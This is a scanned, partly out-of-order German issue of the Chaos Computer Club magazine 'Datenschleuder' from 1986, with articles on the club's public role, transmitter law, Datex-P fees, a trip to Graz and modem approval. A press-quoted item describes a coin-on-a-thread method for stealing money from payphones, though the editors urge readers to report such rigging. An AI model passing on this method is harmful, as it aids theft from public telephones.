anderen. Spektakuläre Aktionen, wie beispielsweise der Btx-Coup, demon­ strative Manipulationen mit Geldautomaten oder die jetzt anstehende Diskussion über Computer-Viren, werden als nachvollziehbare Demonstrationen über Hintergründe im Umgang mit der Technik verstan­ den. Der CCC hat damit eine aufklärerische Rolle für den bewußten Umgang mit Datenmaschinen über­ nommen. So schreibt Walter Volpert in seinem Buch „Zauberlehrlinge - die gefährliche Liebe zum Com­ puter“, die „neuen Hacker“ seien interessant, weil sie als Computer-Enthusiasten den Mythos der unan­ greifbaren Maschine zerstören können. Durch dieses Image in der Öffentlichkeit, hat sich der CCC in den letzten Jahren einen Freiraum erkämpft, in dem unter gewissen Voraussetzungen Hacks möglich sind, die Einzelpersonen in arge Schwierigkeiten bringen wür­ den. Zunehmend versuchen nun Einzelne im CCC-Fahrwasser mitzuschwimmen, indem sie ihre privaten Ak­ tionen ohne Rücksprache mit dem Club als CCC-Aktion darstellen. Dies hat schon in der Vergangenheit eine Reihe von Problemen aufgeworfen. Inzwischen wird für fast jede Aktion in der Bundesrepublik eine Stellungnahme vom CCC erwartet, wobei der CCC über die Hintergründe der bekanntgewordenen Ak­ tionen oftmals nicht informiert wurde. Gleichzeitig besteht wegen der gesellschaftlichen Aufgabe des CCC die Notwendigkeit, einer Kriminalisierung von Hackern entgegenzuwirken. Vor diesem Hintergrund kann der CCC ohne Rücksprache nur unter erschwer­ ten Bedingungen Unterstützung leisten. Rücksprache heißt in dem Zusammenhang, daß rechtliche Konse­ quenzen angesprochen werden sollten, um im Rah­ men juristischer und journalistischer Möglichkeiten eine Kriminalisierung zu verhindern. Dazu sollte sich eine Gruppe zusammenfinden, die Kriterien entwic­ kelt, die als Orientierungshilfen gelten können. Diese Gruppe hätte unter anderem die Aufgabe, sich in die geltende Gesetzgebung einzuarbeiten, um kompetent argumentieren zu können. Darüber hinaus ist zu fra­ gen, ob sich der CCC weiterhin als „Deutschlands Hackerzentrale“ mit Personenkult entwickeln kann — und vor allem — was die einzelnen Mitglieder tun können, um diese allgemein kritisierte Situation zu überwinden. LS23 jwi Ls blofeld Διε Δατενσχλευδερ Mitgliederversammlung desCCCe.V. vom 8.11.1986 Datenschleuder 7 Strahlengefahr aus dem Telefon? In der vergangenen Zeit häuften sich in der Redak­ tion Anfragen von Personen, die ihren Fernsprecher zufällig im Radio empfangen können. Es sind nicht die typischen Filmszenen, in denen der Agent die Wanze durch Drehen am Radio entdeckt. Hier scheint es sich um ein serienmäßiges Merkmal der Postgeräte zu handeln. Wiederholt konnten Fern­ sprecher mit eingebautem Gebührenzähler auf der Freuenz von 405 Khz (zwischen Mittel- und Langerwelle) im Radio empfangen werden. Es scheint, als ob die Gebührenzähler wie Sender wirken und, be­ dingt durch Toleranzen der verwendeten Bauteile, mehr oder weniger weit zu empfangen sind. Manch­ mal muß man das Telefon auf das Radio stellen, in anderen fällen empfängt man es im Auto-Radio. Bisher ist der Fernsprecher TAP 791-Gebanzl mehr­ fach aufgefallen. Leser, die im Besitz eines Empfän­ gers sowie eines Fernsprechers mit Gebührenzähler (vielleicht auch ohne) sind, sollten der Redaktion ihre Erfahrungen mitteilen. Auf dem Congress wird dieses Thema im Rahmen eines Workshops über kompro­ mittierende Abstrahlung behandelt. LS23 Staatliches Wanzenmonopol eingerichtet Post weist auf Anmeldetermin nichtgenehmigter Sendeanlagen hin. Das seit dem 5. Juli 86 geltende „Gesetz zur Verhin­ derung des Mißbrauchs von Sendeanlagen“ hat, laut Aussage der Post, den verstärkten Schutz der Intimund Geheimsphäre der Bürger sowie des Fernmelde­ verkehrs zum Ziel. Dieses Gesetz macht bereits den Erwerb, den Besitz und das Überlassen einer Sendefunkanlage (Sender oder Sender/Empfänger) von einer femmelderechtli­ chen Genehmigung abhängig. Das Betreiben nicht­ genehmigter Sendeanlagen, die im Einzelhandel angeboten werden, war zwar auch vor dem 5. Juli verbo­ ten, der bloße Besitz hingegen gestattet. Die sich noch im Besitz von Personen und Firmen befindlichen nicht zugelassenen Geräte, müssen bis spätestens 5. Januar den Funkstörmeßstellen der Fernmeldeämter gemeldet werden. Auch nach der Bestätigung (unbedingt abfordern!) der Besitzanzeige durch die Post dürfen die Geräte nicht mit einer Stromversorgung, also Netz oder Bat­ terie, verbunden und in Betrieb genommen werden. Datenschleuder 8 Eine Besitzanzeige erübrigt sich, wenn derartige Sen­ deanlagen vor dem 5. Januar 87 für dauernd (nicht mit wenigen Handgriffen wieder einsetzbar) un­ brauchbar gemacht oder einem Berechtigten überlas­ sen werden. Nicht genug damit, daß man abgehört werden kann. Nach der neuen gesetzlichen Regelung muß man da­ für möglicherweise auch noch Strafe bezahlen: Wird man ausspioniert, so werden einem dazu natürlich eine oder mehrere Wanzen (staatlich genehmigte nichtgenehmigte Sendeanlagen) in die Wohnung ge­ setzt. Schon der Besitz derselben ist nun jedoch straf­ bar. Man weiß zwar nichts von dem Besitz, aber Un­ wissen schützt ja bekanntlich vor Strafe nicht. LS23 MÜNZFERN­ SPRECHERTRICKS Ein neuer Gauner-Trick macht der Bundespost zu schaffen, berichtete der SPIEGEL in der Nummer 47. Mit präparierten Fünf- Mark-Stücken plündern Münzdiebe öffentliche Fernsprecher. Der neueste Münztrick gehört nach Einschätzung von Postexperten zum bislang ’’cleversten und ein­ träglichsten Trick” von Gaunern, die sich auf Tele­ fonzellen spezialisiert haben. „Der Trick ist so simpel wie erfolgreich: Ein FünfMark-Stück wird am Rand an zwei Stellen leicht ein­ gekerbt und an einem Faden - bevorzugt reißfestes, aber feines Blumenband - gebunden. Die präparierte Münze wird dann wie gewöhnliches Geld in den Münzkanal geworfen, aber nach einer bestimmten Zahl von Zentimetern durch den Faden gestoppt, der zuvor hinter dem Geldschlitz festgedrückt wurde vorzugsweise mit Kaugummi.“ Die Manipulation ist von aussen nur schwer erkennbar. Das Geldstück baumelt kurz vor der Lichtschranke, die jeden Gel­ deinwurf registriert. Alle folgend eingeworfenen Fünfer (maximal 10) bleiben dort hängen und können durch lösen des Fadens abkassiert werden. Der nahezu als betrugssicher geltende Telephonau­ tomat Typ 21 der bundesweit in 53 000 Fünf-MarkFemsprechern eingebaut ist, wird laut FTZ nicht in­ nerhalb von zwei Jahren ersetzt werden können. Um den Münzdieben auf die Spur zu kommen, setzen Post und Polizei in etlichen Großstädten — mit mä­ ßigem Erfolg — bereits Sondertrupps ein. Die Redaktion empfiehlt Datenreisenden, die in öf­ fentlichen Fernsprechern derartige Manipulationen aufdecken, sofort den Störungsdienst der Post anzu­ rufen. Dem dann anreisenden Stördienst ist die Ma­ nipulation anzuzeigen, sowie der Geldbetrag als Fundsache/Eigeneinwurf quittieren zu lassen. Sol­ ches Vorgehen befreit vom Tatverdacht, der durch eventuelle Wahrnehmung des Fundes unterstellt werden könnte. Bei Komplikationen bittet die Redak­ tion um Information. LS23 Gummiertes Fest Wie in jedem Jahr laufen Weihnachtswunschbriefe aus allen Teilen der Bundesrepublik in 2167 Him­ melpforten ein. In einer Gemeinschaftsaktion des Postamtes, der Gemeinde Himmelpforten und des Weinachtsmanns werden alle eingehenden Sendun­ gen mit einem Schreiben beantwortet. „Oh,Oh,Oh! Mir wird schon schwummerig, wenn ich die großen Stapel Wunschbriefe hinter mir sehe“, stöhnt dort der Weinachtsmann. Ohne die Hilfe der Erdenpost wür­ den er und das Christkind verzweifeln. Zum Glück hat er tüchtige und fleißige Helfer. So bleibt ihm nur noch, die Briefmarken auf den Antwortbriefen mit einem (s. Abbildung) weihnachtlichen Stempel zu entwerten. LS23 / GESCHENKARTIKEL Neue Gebühren Datex-P wird teuer Grünliche Computerstudie Erste Wühlperiode abgeschlossen „Die Einführung der Computertechnik gestaltet sich für die Grünen im Bundestag so schwer wie für ande­ re der Ausstieg aus der Atomindustrie. Für beide geht es an die Strukturen“, beginnt eine Studie über die „Computerisierung der Fraktion“ (PARLAKOM), die gemeinsam von CCC/APOC (Arbeitskreis politi­ scher Computereinsatz) und deren FreundInnen als Hilfestellung auf dem Weg zu einer fundierten Post­ politik erstellt wurde. „Hisrisch geht es seit Herrschafts Zeiten um die Kon­ trolle des fortgeschrittensten Mediums. Politisch um informationeile Selbstbestimmung. Kulturell um die Entwicklung von Netzwerken, netzgemäßem Denken und Handeln. Wirtschaftlich muß eine dezentrale Netztechnologie entwickelt werden.“ Die endgültige Genehmigung zur Veröffentlichung der Studie von gut 50 Seiten Umfang wird derzeit von der Bundestagsverwaltung bearbeitet. Der Verkauf­ spreis wird zwischen DM 6,66 und 7,50 liegen. Ask Your Local Dealer else CCC. Gosub Next Artikel. ls5 „Der Verwaltungsrat der Deutschen Bundespost hat der von Rostminister Schwarz-Schilling vorgelegten 29. Verordnung zur Änderung der Fernmeldeord­ nung zugestimmt. Diese Verordnung enthält neben Gebührensenkungen von im Saldo 330 Millionen DM jährlich...“, so beginnt eine Presseerklärung der OberPostDirektion Hamburg. Neben den Gebühren­ senkungen für Tastentelefone (die werden für intelli­ gente Netze der Post gebraucht und müßten sowieso ausgetauscht werden) versteckt sich eine entschei­ dende Änderung im Datex-P-Verkehr. „Für den Zugang aus dem öffentlichen Fernsprech­ netz zu Endeinrichtungen im öffentlichen Datex-PNetz werden die entfernungsabhängigen Zugangsge­ bühren am 1. April 1987 (scherzlos) durch entfer­ nungsunabhängige Gebühren ersetzt. Dadurch wer­ den Standortnachteile ausgeglichen.“ Die Pressestelle des Rostministeriums erläuterte die Maßnahme: Das Datex-P-Netz hätte nur einen klei­ nen Teilnehmerkreis, der über das Fernsprechnetz zugreift. Die Gebührenänderung würde nur wenige betreffen und den meisten Vorteile verschaffen. Ge­ plant ist ein Zeittakt von 50 Sekunden am Tag und 75 in der Nacht. Für Nutzer aus Orten, in denen bisher Datex-P zum Ortstarif erreichbar ist, entstehen über neunmal so hohe Fernsprechgebühren. Nutzer aus der Femebene sparen nur wenig und zahlen im Nachttarif oft drauf. Bildschirmtext, die „Wunschmaschine“ (so das Bun­ desrostministerium) fürs Volk ist bundesweit zum Orts- oder Nahtarif zu erreichen. Die Post fördert den falschen Dienst. Btx ist ein System, bei dem Zentrale und Endgeräte nicht sonderlich intelligent sind. Über die zukunft­ strächtigen Datennetze wie Datex dagegen lassen sich relativ einfach beliebig viele intelligente Systeme koppeln. Intelligente Netze und Kommunikationssysteme auf der Datex-P Übertragungsebene bleiben durch diese Gebührenstruktur weiterhin vielen aus Kostengrün­ den verschlossen. ls23 Datenschleuder 9 ENTWICKLUNGSHILFE Chaos-Dienstreise nach Graz Eines Tages wurde uns durch den Besuch des Vorsitzenden der Studentenschaft der Technischen Universität Graz bekannt, daß die TU Graz anläßlich ihres 175- jährigen Bestehens eine Veranstaltung mit dem Titel „TECHNIK FEIERN“ geplant hatte, da es ja zu langweilig wäre, ständig maschinenstür­ merisch auf die Technik zu schimpfen, und man ja nun endlich einmal einen Kontrast dazu schaffen müsse. Das Schaffen eines Kontrastes ist den Organisatoren zumindest mit ihrem Ankündigungsplakat gelungen: Rote Schrift auf grünem Grund. Wir bekamen netterweise eines dieser kontrastreichen Plakate überreicht, worauf zu lesen war, daß der ChaosComputer-Club aus Hamburg bei der Veranstaltung mitwirken würde. Der Veranstalter teilte uns mit, daß man nunmehr nicht mehr auf uns verzichten könne, da unser Vortrag bereits durch Verbalpropaganda als der „Hammer" angekündigt wor­ den sei. Wir beschlossen, uns den Tatsachen zu fügen und uns für den „Tag X“ in Köln zu verabreden, da dort etwa zeitgleich die Orgatechnik- Messe stattfand, die ohnehin besucht werden mußte. Ähnlich geschah es auch wenig später in Köln. Wir trafen uns nach einigen orgatechnischen Problemen tatsäch­ lich auf der Messe und begaben uns nach dem einen oder anderen, nebenbei bemerkt, recht erfrischenden Kölsch und einer gutbürgerlichen Mahlzeit mit etwa zwanzig Hackern aus rund vier Bundesländern, in Clinch’s Chaos-Mobil, welches den Antritt der Reise schon dadurch erheblich vereinfachte, daß es sofort ansprang. Datenschleuder 10 der Ungleichungsformel ER-AS=0 verhielten. In Graz er­ hellten sich die Straßen wieder, doch das beleuchtete unsere Vorstellung vom genauen Ziel nur unwesentlich. Nicht zuletzt deshalb sah sich unser Amateurfunker genötigt, seinesglei­ chen in der Fremde zu suchen. Glücklicherweise gibt es auch in Graz einige wenige amateurfunkende Spätaufsteher. Ama­ teurfunker sind eine ganz seltsame Sorte Mensch. Erst be­ werfen sie sich eifrig mit Q-Gruppen und Rufzeichen, um danach vergessen zu haben, was sie eigentlich sagen wollten. Da braucht selbst BettNett, obwohl von HAL, weniger Over­ head. Wir fragten also die freundlichen Funker, wo’s denn zur TU gehe. Sofort entbrannte eine heiße Diskussion zwischen den Lokalamateuren, wo wir uns wohl befänden und was wohl der geeignetste Weg dorthin wäre. Unserem Mobilfunker gelang es nicht seinen Ein-Watt-Phallus dazwischenzuhalten, und so begab es sich, daß wir uns schon längst nicht mehr an der spekulativ ermittelten Stelle befanden. Unser Mobilfunker hatte auch nicht gerade die Gabe, sich besonders präzise auszudrücken. Er gab den Lokalfunker so aussagekräftige Hinweise wie etwa „Auf der rechten Stra­ ßenseite sehe ich ein Vorfahrtschild“ oder „Direkt hinter uns fährt ein roter Käfer, und zwar genau in Decklinie mit einem mittelgroßen Haus“. Die Antwort (nach eingehender Dis­ kussion natürlich) fiel etwa ähnlich informativ aus: „ Wenn Ihr die Straßenbahnschienen seht, müßt ihr sofort halb-rechts abbiegen! “. Wären wir dieser Auskunft gefolgt, hätten wir uns wohl in Wien wiedergefunden, da in Österreich bekanntlich alle Wege nach Wien führen - früher oder später. Das Gelände der Uni war im Grunde unverfehlbar, da Graz zu einem ungewöhnlich hohen Prozentsatz aus Universität besteht, so verfehlten auch wir es nicht. Wir fuhren die Auffahrt hinauf zum großen Portal. An dem Tor war ein Zettel angeheftet auf dem in Caps-Lock drei riesige C’s zu sehen waren. Der inliegende Text wies aus, daß der Organisator im Restaurant „Laufke“ zu finden sei. Es kostete uns nur zwanzig Minuten, das zwei Straßen weiter gelegene Restaurant aufzusuchen, welches ohne jeden Zweifel in der Lage war, uns für jeglichen Mangel des Zielgebietes zu entschädigen. Das beschriebene Restaurant ist eine gastronomische Oase am Rande des Uni­ versums. Man kann bequem dem Weltuntergang entgegen­ sehen. Die erste Nacht, die nun über die Stadt hereingebrochen war, verbrachten wir in unterschiedlich komfortabel ausge­ statteten Unterkünften. Zwei ppl. bei einem Architekturpuri­ sten, der Letzte in einer Mädchen-WG. Ich selbst schloß mich ersterer Möglichkeit an, da diese gesicherte Nachtruhe zu versprechen schien. Der folgende Tag meldete sich vorsichtig mit einem laserartigen Sonnenstrahl von höchstens zwei Mil­ liwatt Leistung und einem vorzüglichen, unverlängerten tür­ kischen Kaffee an. An der TU standen zwar ein paar VAXen im Glaskasten, ein Telefon zu finden, jedoch, war ein aus­ sichtsloses Unterfangen. Der freundliche Organisator war stets bereit, uns jede nur erdenkliche Hilfestellung angedeihen zu lassen, so machte er sich auf den Weg ein Telefon zu besorgen. Ich muß gestehen, daß ich ein wenig entsetzt drein­ geschaut haben muß, als er zurückkehrte. Er überreichte mir freudestrahlend einen Fernsprechapparat. „Hier hast du ein Telefon“, sagte er in erhebender Tonlage. Es gelang uns, ihm zu erklären, daß Wasserhähne, um Wasser zu speien, an eine Wasserleitung angeschlossen werden müssen, und es sich mit Telefonen nicht wesentlich anders verhalte, mit dem einzigen, feinen Unterschied, daß in diesem speziellen Falle eine Was­ serleitung nicht helfe. Dieses Problem sollte sich erst später, ca. 5 Minuten vor Beginn des Vortrags, klären. Ich rief dann ersteinmal die Post an, um die Telefonnummer für den Grazer Datex-P Vermittlungsrechner zu erfragen. Man informierte mich postwendend, daß der Telefonzugang für Datex-P ge­ plant, über den Beginn der Arbeiten jedoch noch nichts be­ kannt sei. Ich mußte erneut schlucken. Das also war der Grund für die unangemessen schwache Vertretung Österreichs in der NetworkerCrew. Glücklicherweise hatte eine der Uni-VAXen einen Datex-P10 Hauptanschluß und die SysOps der VAXen waren SEHR KOOPERATIV (!!!). Leider hat das Packet Switching Interface (PSI) unter dem dort laufenden VMS 4.1 noch eine kleine Macke, so daß ich unabsichtlich die DECNET-links zwischen den Nodes „RECH:: “ und „STG: : “ - unwiderruflich bis zum nächsten re-boot beider Maschinen - in den Wald geschickt hatte. Wie bereits erwähnt, kam in letzter Sekunde die rettende Idee. Wir schraubten das einzige voll amtsberechtigte Vierteltelefon im Erdgeschoß auseinander, klebten die ungleichen Sprech- bzw. Hörkapseln mit denen eines Haustelefonanapparates zusammen und stell­ ten einen Mann für die Aufgabe des Wählens im Erdgeschoß ab. Im Hörsaal Sechs, in den die Veranstaltung verlegt worden war, da dort der einzige Terminalanschluß möglich war, gab es murphylogischerweise keinen Haustelefonanschluß. Ge­ nerell war in Graz die technische Ausstattung für eine tech­ nische Universität eher dürftig. So mußte die Veranstaltung erneut umziehen - In die Aula, wie eingangs geplant. Der Computer, der auch nur durch das Ausleihen einer CGA-Karte im wohl einzigen Compi-Shop von Graz dazu überredet wer­ den konnte, auf dem Video-Beam sinvolle Zeichen abzubil­ den, sowie der Großbildprojektor selbst, mußte mit vereinten Kräften in den ersten Stock getragen werden, wo mein mit­ gebrachtes Schlabberphon an einem Haustelefonhörer lauerte. Der im Erdgeschoß abgestellte Mann wählte den hamburger PAD an und siehe da, der hatte nichts dagegen, uns die große weite Datenwelt zu offenbaren. Wir ließen also den üblichen Senf von Vernetzung, Technik, Post, Fun und so ab, pilgerten über die lange Leitung nach CERN, dem Mekka der Hacker, und demonstrierten dort noch ein bißchen BettNett. Der Vor­ trag selbst verlief recht ordentlich, wie mir schien. Ich selbst An diesem Punkt wäre vielleicht zu bemerken, daß dieses für eine derartige Reise recht bemerkenswert ausgestattet ist. Es besitzt nicht nur Sitze für Fahrer und Beifahrer sowie zwei weitere Personen der technologischen Zukunft, sondern auch ein eingebautes Digitalvoltmeter, diverse Antennen und eine gut zugreifbare Gerätesteckdose für TV, Amateurfunkgeräte und optionales digital equipment (tm). Eine zweifarbige Leuchtdiode zeigt stets den Betriebszustand der Aggregate an, deren Nachrichten zu verstehen, ich jedoch mangels ausrei­ chender Morsekenntnisse, nicht in der Lage war. Es vergingen einige Minuten Fahrzeit bis wir in München eintrafen um uns ein Quartier für die Nacht zu suchen. Mit freundlicher Hilfe der Kollegen von der B.H.P. ließ sich relativ schnell eine kom­ fortable Übernachtungsstätte in einem Rehabilitationszen­ trum am Rande der Stadt ausfindig machen. Am nächsten Morgen gerieten wir aufgrund bisher ungeklärter Ursache erneut auf die Autobahn, die uns ohne Umwege an die Öster­ reichische Grenze leitete. Nun wurde vieles anders. Das Essen auf den Raststätten wurde deutlich besser, auch der Geldsack konnte sich etwas von den kölner Strapazen erholen. Die primäre Euphorie wurde jedoch schon nach wenigen K metern durch den Ärger über die Straßenverhältnisse kompensiert. Außer einem Vergrauten Verkehrsschild ließ kaum noch et­ was darauf schließen, daß wir uns auf einer Autobahn be­ fanden. Der Äbergang zwischen Autobahn und Krautacker wurde durch regen Regen zunehmend fließender. Die erste Begegnung mit der Zivilisation des Zielgebietes hatten wir auf einer Autobahnraststätte ca 50 K meter vor Graz. Dort kämpf­ te eine ganze Armee Österreicher mit einer nicht zu öffnenden Kaffeemühle. Sie hatten die Maschine mittels eines Vorhän­ geschlosses gegen den Zugriff unauthorisierter Wesen zu sichern gesucht, was unweigerlich dazu führen mußte, daß die Sicherungen den authorisierten Benutzern den Zugriff ver­ sperrten. Ich halte es für höchst zweifelhaft, anzunehmen, daß sich ein unauth orisierter Benutzer durch eine derartige Si­ cherung von seinem Vorhaben hätte abbringen lassen. Mittlerweile hatte sich der Wasserstand im Chaos-Mobil de­ rart dramatisch erhöht, daß eine Gefährdung der technischen Einrichtungen nicht mehr auszuschließen gewesen wäre, wenn wir nicht den Unterboden mit einem Loch versehen hätten. Mit der üblichen Präzision durchschlugen wir den Fahrzeugboden mittels eines Spezialwerkzeuges (CCC ge­ nuine part No. 1254/VSM), so daß einfließendes Regenwasser (ER) und ausfließendes Schmutzwasser (AS) sich exakt nach verlor nur zweimal den Faden und drehte nur eine einzige Schleife in meinem Konzept. Auch der Veranstalter zeigte sich zufrieden. Nach dem Vortrag giftete noch irgendein konser­ vativer Zwerg aus der Reihe mitte rechts, daß das doch aber alles illegal und destruktiv sei, konnte sich aber mit dieser Ansicht nicht ganz durchsetzen. Ein erfreulicheres Erlebnis war da schon, einige alte Bekannte zu Gesicht zu bekommen: die ausgesprochen nette, durch Zweiradfahrt etwas durch­ gefrorene Schwester unseres Chefredakteurs und desselben Mitbewohner eines hamburger Appartements. Auf der Rück­ fahrt waren uns Österreichs Wettergötter erheblich wohlge­ sonnener, wodurch wir eine etwas wohlbesonntere Heimkehr betreiben konnten. Nach dem obligatorischen Überfall der Straßenräuber (Mautgeldjäger) trafen wir erneut in München ein. Dort plauderten wir nachmittags noch etwas mit dem Boxmanager „KR“ von Markt & Technik, versuchten unseren Greuel einzufangen, stießen dabei nur auf eine verschlafene Hackersfrau, und mußten die Stadt doch unverrichteter Dinge verlassen. Pünktlich um sieben Uhr morgens konnte unser Chaospostler Clinch wieder seinen Dienst bei der Bundespest in Hamburg antreten. Vic. Datenschleuder 11 Axel Schaefer 1986 Postmodemballade Ein postmodernes Melodram „Es begab sich aber zu dieser Zeit, daß ein Gebot ausging von dem Postminister, daß alle Modems amtens abgeschätzet werden.“ So hätte der Chronist die Tatsache beschrieben, daß Zusat­ zeinrichtungen zur Datenfernübertragung, kurz MoDems ge­ nannt, der Zulassung durch das Femmeldetechnische Zen­ tralamt (FTZ) in Darmstadt bedürfen. Keinesfalls darf man bekanntlich Geräte ohne Zulassungsnummer, oder gar - ein Frevel - selbstgetöpferte Konstruktionen a la Datenklo ohne den Segen der Post an das Femmeldenetz anschließen. Das führt, so man Besitzer eines Computers ist, dem die Post nicht die selig machende allgemeine Zulassung erteilt hat, oft zu abenteuerlichen Eigenbauten (AE). Diese AE umgehen die postalischen Bestimmungen einfach dadurch, daß sie den Einfallsreichtum der Verfasser der Femmeldeordnung über­ treffen und somit in derselben gar nicht erwähnt werden. Wir denken hier vor allem an die letzthin beschriebene „Kat­ ze“, die rein mechanisch das Abheben des Telefons besorgt. Ein solches Gerät hat den Vorteil, daß man damit relativ ruhigen Gewissens auch auf einem C 64 eine Mailbox be­ treiben kann. Mit dem Nachweis, daß eine solche „Katze“ nicht den Vorschriften entspricht, tut die Post sich ziemlich schwer. Beharrlichkeit führt hier oft zum Ziel, denn die „Kat­ ze“ ist so konstruiert, daß sie eben und eben nicht in der Femmeldeordnung verboten wird. Hat man sich irgendwann dazu aufgerafft, einen neuen Rech­ ner nach dem von Incredibly Bad Machines gesetzten Stan­ dard zu erwerben, denkt man beim Kauf natürlich auch daran, daß viele dieser Geräte eine FTZ-Nummer (amtlichen Automaten-Taufschein) haben und gibt dankbar ein paar Mark mehr dafür aus. Endlich darf man mit dem Segen der Post ein Modem betreiben. Also auch seine Mailbox endlich auf den Boden derFDGO stellen, sprich legal arbeiten. Und wenn man grade so schön am Planen ist, kommen einem auch die wun­ dervollen Möglichkeiten des Datex-Dienstes der Post in den Sinn. Also wird ein Antrag beantragt. Kaum zehn Tage später, sagen wir Anfang Mai, kommt Post von der Post. Anträge für Modems und für Datex-P-Hauptanschlüsse, und eine Liste der verfügbaren Modems. Nun, man weiß sowieso, was man will, Modems zu 1200 und 300 Baud, umschaltbar, und dann noch ein Hauptanschlüsschen für Datex-P20. Und ab die Post Die Wochen ziehen ins Land. Nichts rührt sich. Irgendwann dann ein Anruf von der Anmeldestelle: „Sie haben hier einen Antrag auf einen Datex-Hauptanschluß gestellt. Wollen Sie das wirklich, oder wollen Sie nur eine Softwarekennung? " Datenschleuder 12 Messerscharf geschlossen - der Mann meint ’ne NUI. Aber sowas ham wer doch schon. Wir setzen dem Herrn ausein­ ander, daß wir tatsächlich das haben wollen, was wir bestellt haben. Damit ist dann vorerst wieder Ruhe. Es ist Juli geworden. Die Mailbox läuft mittlerweile auf dem PC, allerdings immer noch mit der eigenwilligen Abhebe­ mechanik. Die Post scheint ab und zu noch ein paar Rückfragen zu haben, erkundigt sich, welche Modems man denn nun gern hätte und erhält bestätigt, daß man tatsächlich an den be­ stellten Geräten festhält. Man liefert eine Kurzbeschreibung der „Katze“, daraufhin Schweigen am anderen Ende der Lei­ tung, dann ein unfrohes „Naja“. Keine drei Wochen darauf ein weiterer Anruf: „Mein Kollege hat Ihnen doch schon vor zwei Wochen gesagt, Sie sollen Ihr Modem abklemmen usf... " Der Versuch, auch diesem Herrn klarzumachen, daß man kein Modem benutzt, sondern einen zugelassenen Koppler, scheitert an dessen Selbstbewußtsein. „Nehmen Sie das Ding ab oder Sie haben morgen früh die Betriebssicherung im Haus. Die Modems kriegen Sie dann Anfang August. " Betrübt steckt man seine „Katze“ ins Körbchen und stellt den Boxbetrieb ein. Istja nur für ein paar Tage. Auf der Datex-Seite regt sich plötzlich auch was: Im Briefkasten ein Kärtchen mit der Bitte, den Baubezirk anzurufen. Ein Teil wunder geschieht: Mitte Juli werden die Strippen für den Anschluß gelegt. Von den dazu benötigten Modems keine Spur. Dafür am nächsten Tag ein Brief mit „...können wir Ihnen keine Anschlußgenehmigung erteilen..." Zwischenzeitlich gelingt es dem An­ tragsteller, den schriftlichen Nachweis zu erbringen, daß er in der Lage ist, seinen eigenen Computer auch selbst zu unter­ halten wie es die Bestimmungen erfordern. Die Tage ziehen ins Land, bis Anfang August die langer­ sehnten Auftragsbestätigungen für die Femsprechmodems eintrudeln. Voraussichtlicher Anschlußtermin: 12. August. Das nächste Teilwunder: Auch die Anschlußgenehmigung für Datex-P kommt an. Es folgt Stille bis zum 11. August, an dem der Antragsteller bei der Rückkehr von der anständigen Arbeit eine Karte im Kasten vorfindet. Offenbar waren die Herren vom Baubezirk morgens dagewesen. Baubezirk anrufen, neuen Termin vereinbaren. Und siehe da: die Strippen werden gezogen, Anschlußdosen gesetzt - und das wars schon wieder. Nochmal Baubezirk anrufen. „Damit ham wir nichts zu tun, das is ’ne andere Dienststelle... “ Die zuständige Dienststelle konstatiert neuen Sand im Getriebe: „Die Kollegen haben bei Ihnen ADo8 gesetzt (das sind die alten Dosen mit 8 Kontak­ ten). Für Ihre Modems brauchen Sie aber TeAeö6(das sind die, mit denen z.B. dasDBT03 angeschlossen wird), das muß erst noch geändert werden." Wie auch anders. BaubezirkanrufenTerminvereinbaren. Nachdem die Dosen ausgewechselt sind: Anruf beim Fernmeldeamt 4, nachhaken in der Modemfrage. Doch da sei die Post vor, es fehlen ja noch die Datentelefone. Die bringt wieder eine andere Dienststelle. Nach einer Safari durch den Postdienststellendschungel kom­ men auch die Datentelefone angekrochen. Man beginnt der Ansicht zuzuneigen, daß unter den Urahnen der Postbeam­ tenschaft zwar nicht der Erfinder des Rads zu finden ist, möglicherweise aber der Erfinder der Bremse. Am 10. September hebt sich der Vorhang zum vorerst letzten Akt des Melodrams: Die Modems werden angeschlossen. Dabei stellt sich heraus, daß die Datentaste an den Telefonen nicht funktioniert, was man aber als Nebensache hinnimmt. Schließlich hat jedes Modem noch eine eigene Datentaste, und man will ja eh hauptsächlich ankommende Rufe beanswern. In aller Ruhe werden noch zwei V24-Kabel zusammenge­ braten. Fünf Monate nach Antragstellung, und zwei Monate nach Beginn der Zwangspause, kann die Box wieder online gehen. Der einzige Unterschied zwischen dem alten Betrieb vermittels „Katze“ und dem neuen mit Postmodern: 100 DM. Soviel kosten die Modems pro Monat Achja, der Datex-Anschluß. Er wurde bislang noch nicht funktionsfähig übergeben. Aber wir haben ja erst Ende Sep­ tember. goblin Die Bratenschleuder Was? Das ist der Gipfel der Barbarei! Gastrokybernetische Appetithappen Es ißt so weit: Tomatomat Plus Erstes Deutsches Salatverarbeitungsprogramm - automatischer Einzelblatteinzug (Chicoree und Chinakohl optional) automatischer Saucenumbruch am Schüsselrand 144 verschiedene Gewürzarten und unterstrichener Genuß Implementierte Schnittstelle zur Beilagenverarbeitung (INTERFRESS) zwanzig Kräutertasten frei definierbar frei definierbare Fruchtsequenzen für Obstsalate selbstregenerierbare Schnitzelsätze Proportionaldekoration auf Tellern mit Schnitzelsatzdownload zum Beispiel OKIGAGA, ΥΑΗΑΜΗΑΜ und Hausknecht. Farbdarstellung auf Gabelmatrixgeräten, EAT-CHAT’S und Mikrowellenprintern. Erstellung von Kühldateien für Picknick und Camping Auto-Scratch bei überschrittenem Haltbarkeitsdatum Saftware: 1-2-dry Quartalsaufprogramm Übertragung seriell oder über Breittrinkkabel mehrbenutzerfähig durch Kanalsharing grafikfähig, 3D-Promilleanzeige Gröhlgenerator verschiedene grafische Ausnüchterungsmuster - Trink Tank: Tea Base I multitassing teatimesharing verschiedene Teezeremonien einprogrammiert datenkompatibel zu SAMOWAR-STAR vom VEB Subitnik. integriertes Wasserprüfprogramm Sortenautomatik Earls Cray mit beschleunigtem Regalzugriff Mischroutine Darjee-Link selbst anpassender Kochprozessor HOT-1 zukunftssicher durch Gasbetrieb Datex-T Fernwärmeadapter Datenschleuder 13 Erinnerungen an die Zukunft von Ernst Schnarrenberger Moewig Sachtaschenbuch DM 9.80 ISBN 3-8118-3210-7 „Krimi“ schrie mir ein Chaot entgegen, nachdem er die ersten Seiten dieses Buchs gelesen hatte. Leider hat er recht. Nach dem Prinzip „Quellenange­ ben, was ist das ?“ schildern die Autoren einige Fälle von Computerkriminalität, unter anderem auch den Hacking-Fall eines Dipl.Ing. Dabei vergaßen sie je­ doch fast immer, ihre Quellen zu dokumentieren. Nur in einigen wenigen Fällen rafften sie sich dazu auf, außer dem Zeitungsnamen auch das Datum oder die Ausgabennummer bekannt zu geben. Da nichts wirk­ lich drinsteht, außer daß die BHP zur Kultzeitung er­ hoben wird, verschwendetes Geld. Ls 4007 „Positronische Systeme sind unfehlbar. 